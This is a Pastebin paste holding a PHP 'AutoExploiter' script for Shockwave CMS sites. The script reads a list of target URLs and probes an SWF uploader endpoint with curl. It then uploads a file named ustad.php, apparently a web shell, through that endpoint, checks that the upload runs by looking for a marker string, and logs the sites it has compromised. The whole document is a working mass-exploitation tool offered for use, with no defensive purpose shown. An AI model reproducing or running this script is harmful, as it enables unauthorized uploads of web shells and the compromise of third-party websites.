Advertisement
ustadcage_48

Shockwave AutoExploiter

Jan 12th, 2019
315
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.96 KB | None | 0 0
  1. <?php
  2. ## coded by UstadCage_48
  3. ## usage php swf.php list.txt
  4. error_reporting(0);
  5. function wr($cl,$st){
  6.     $cc .= "\033[" . $cl . "m";
  7.     $cc .=  $st . "\033[0m";
  8.     return $cc;
  9. }
  10. function sv($site,$ext){
  11. $fp = fopen("$ext.txt", 'a');
  12. fwrite($fp, "$site\n");
  13. fclose($fp);
  14. }
  15. $sites = explode("\n",$argv[1]);
  16. function swf($url){
  17.     $uu = "$url/admin/content/ajax_general/swf-uploader/upload-maps-file.php";
  18.         $cek = shell_exec('curl --silent -i '.$uu);
  19.     if(preg_match("/Complete./",$cek)){
  20.         $tt = "[Vuln]";
  21.         sv($uu,"vuln");
  22.     } else {
  23.         $tt = "[Not]";
  24.     }
  25. $cod = shell_exec('curl --silent -F "Filedata=@ustad.php" '.$uu);
  26. preg_match('/Complete.[*][*][*](.*?)[*][*][*]/',$cod,$resi);
  27. $dat = $resi[1];
  28. if(preg_match("/SENPAI/",file_get_contents($url."/".$dat))){
  29.     $cc = "[".wr("0;32","OK")."]";
  30.     echo sv($url."/".$dat,"swf23");
  31.     } else {
  32.     $cc = "[".wr("0;31","BAD")."]";
  33. }
  34. return "[=] ".$url." ".$tt." : ".$cc;
  35. }
  36. foreach($sites as $url){
  37.     echo swf($url);
  38. }
  39. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement